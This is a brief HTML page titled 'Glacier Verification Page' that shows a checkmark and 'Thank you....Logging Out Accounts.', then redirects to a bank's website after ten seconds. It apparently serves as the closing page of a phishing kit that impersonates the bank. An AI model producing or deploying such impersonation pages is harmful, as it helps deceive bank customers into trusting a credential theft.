<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="10; URL='https://www.glacierbank.com/">
    <title>Glacier Verification Page</title>
    <style>
        body {
            background-color: white;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
        }
        .container {
            text-align: center;
        }
        .checkmark {
            font-size: 100px;
            color: green;
        }
        .message {
            font-size: 16px;
            margin-top: 10px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="checkmark">✔️</div>
        <div class="message"><strong>Thank you....Logging Out Accounts.</strong></div>
    </div>
</body>
</html>
